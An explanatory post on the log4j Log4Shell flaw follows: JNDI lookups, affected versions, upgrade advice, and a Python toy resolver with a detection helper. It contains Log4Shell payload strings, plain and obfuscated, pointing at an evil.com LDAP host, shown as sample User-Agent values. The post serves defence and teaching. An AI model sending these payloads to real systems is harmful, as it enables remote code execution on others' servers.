TL;DR: log4j vulnerability
LDAP & JNDI
Java can connect to an LDAP server and retrieve the attributes of a directory object. For example, the URL ldap://server:389/o=Test names the object o=Test on that server, and the server can be any LDAP server the client is able to reach. JNDI (Java Naming and Directory Interface) is the Java API that performs such lookups: given a name or URL, it asks a naming service (LDAP, RMI, DNS, ...) for the bound object, and what comes back can be a serialized Java object or a reference that makes the JVM load and instantiate a class at runtime.
Exploitation
log4j implements lookups: a string such as ${env:PWD} inside a log message is replaced by the value of the PWD environment variable before the message is written. Moreover, the JNDI lookup was enabled by default, so writing ${jndi:ldap://evil.com/} into anything that gets logged makes the server itself resolve that URL, then load and execute, using JNDI, the Java object that comes back. An attacker therefore only needs to host a malicious Java object, expose it over LDAP, and get the string logged to obtain remote code execution. The string does not have to reach a log call verbatim either: any attacker-controlled value that ends up in a logged message is evaluated, whether it is concatenated into the message or passed as a parameter to logger.info, and typical carriers are HTTP headers such as User-Agent, usernames and form fields.
Who is vulnerable?
Any application that passes attacker-influenced input to a vulnerable log4j 2.x (2.0-beta9 through 2.14.1) is exposed, and log4j is used across the internet, often as a transitive dependency you may not know you ship. At the time of writing there is only one critical vulnerability that you should fix immediately: CVE-2021-44228. The rest (CVE-2021-4104, CVE-2021-45046) are not that interesting, as they require the attacker to be able to edit configuration files or rely on specific configurations: CVE-2021-4104 is a deserialization issue in log4j 1.x's JMSAppender that needs write access to the log4j configuration, and CVE-2021-45046 (the incomplete 2.15.0 fix) needs a non-default PatternLayout that pulls attacker-controlled data from the Thread Context Map. log4j disabled the JNDI lookup by default from 2.16.0, so upgrade to 2.16.0 or later, and check transitive dependencies too, since a single vulnerable log4j-core jar anywhere on the classpath is enough.
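To make the lookup mechanism from the Exploitation section concrete, and to show how logged user input turns into a JNDI request, here is an added Python model of log4j's ${prefix:key} substitution. It is illustrative code written for this page, not log4j's own code. It resolves nested lookups innermost-first, which is why obfuscated payloads such as ${${lower:j}ndi:...} end up as a plain JNDI lookup; the jndi handler only records the URL instead of connecting. The handler names (env, lower, upper, jndi), the :- default syntax, the case-insensitive prefix match and the sample User-Agent values are assumptions constructed for the illustration; log_message mimics a logger.info("...{}", input) call, and find_jndi_urls shows how to triage captured input by evaluating it in a sandboxed engine rather than grepping for ${jndi:.

```python
"""Toy model of log4j 2.x (pre-2.16) lookup substitution.

Added illustration, not log4j's own code: ${prefix:key} lookups in a log
message resolve innermost-first, so attacker text can become a ${jndi:...}
lookup the logger itself evaluates.  The jndi handler only records the URL;
real log4j fetches and loads the object.  Handler names, ':-' defaults and
case-insensitive prefixes are assumptions of this toy, not log4j's spec.
"""
import os


class LookupEngine:
    def __init__(self, env=None, jndi_enabled=True):
        # env: mapping consulted by ${env:NAME}; defaults to the real one
        self.env = dict(os.environ) if env is None else env
        self.jndi_requests = []  # URLs a vulnerable logger would have fetched
        self.handlers = {"env": self.env.get, "lower": str.lower,
                         "upper": str.upper}
        if jndi_enabled:  # log4j 2.16.0 disabled this lookup by default
            self.handlers["jndi"] = self._jndi

    def _jndi(self, url):
        self.jndi_requests.append(url)
        return "<object loaded from %s>" % url

    @staticmethod
    def _matching_brace(text, start):
        """Index of the '}' closing the '${' at *start*, or -1 if none."""
        depth, i = 1, start + 2
        while i < len(text) and depth:
            if text.startswith("${", i):
                depth, i = depth + 1, i + 2
            else:  # a '}' closes one level, anything else is literal
                depth, i = depth - (text[i] == "}"), i + 1
        return i - 1 if depth == 0 else -1

    def _lookup(self, inner, literal):
        """Resolve one 'prefix:key[:-default]'; keep *literal* if unknown."""
        prefix, sep, key = inner.partition(":")
        if not sep:
            return literal
        default = None
        if ":-" in key:
            key, default = key.split(":-", 1)
        handler = self.handlers.get(prefix.lower())
        value = handler(key) if handler else None
        if value is None:
            return literal if default is None else default
        return value

    def resolve(self, text):
        """Substitute every ${...} in *text*, resolving nested ones first."""
        out, i = [], 0
        while i < len(text):
            if text.startswith("${", i):
                end = self._matching_brace(text, i)
                if end == -1:  # unbalanced: emit the rest verbatim
                    out.append(text[i:])
                    break
                inner = self.resolve(text[i + 2:end])
                out.append(self._lookup(inner, text[i:end + 1]))
                i = end + 1
            else:
                out.append(text[i])
                i += 1
        return "".join(out)


def log_message(engine, fmt, *args, message_lookups=True):
    """Mimic logger.info(fmt, args...): parameters are formatted into the
    message first and (pre-2.16) lookups then run over the whole message.
    message_lookups=False models 2.16.0, which stopped evaluating them."""
    message = fmt
    for arg in args:
        message = message.replace("{}", str(arg), 1)
    return engine.resolve(message) if message_lookups else message


def find_jndi_urls(text):
    """Triage helper: evaluate *text* with an empty env and a recording-only
    jndi handler; returns the URLs a vulnerable log4j would fetch.  Unlike a
    '${jndi:' regex this also catches nested/obfuscated payloads."""
    engine = LookupEngine(env={})
    engine.resolve(text)
    return engine.jndi_requests


# Constructed sample User-Agent values, as a web app might log them.
SAMPLE_USER_AGENTS = [
    "Mozilla/5.0 (X11; Linux x86_64)",
    "${jndi:ldap://evil.com/a}",
    "${${lower:j}ndi:${lower:ldap}://evil.com/a}",
    "${env:PWD}",
]

if __name__ == "__main__":
    for ua in SAMPLE_USER_AGENTS:
        engine = LookupEngine(env={"PWD": "/srv/app"})
        print(ua, "->", log_message(engine, "User-Agent: {}", ua))
        print("   jndi URLs a vulnerable logger would fetch:", find_jndi_urls(ua))
```

Running the module prints, for each sample value, what a pre-2.16 logger would write and which URLs it would have fetched; the benign User-Agent and the ${env:PWD} line produce no JNDI request, while both the plain and the nested payload resolve to ldap://evil.com/a. Passing jndi_enabled=False (the 2.16.0 default) or message_lookups=False leaves the payload in the log as inert text, which is the behaviour you want to confirm after upgrading.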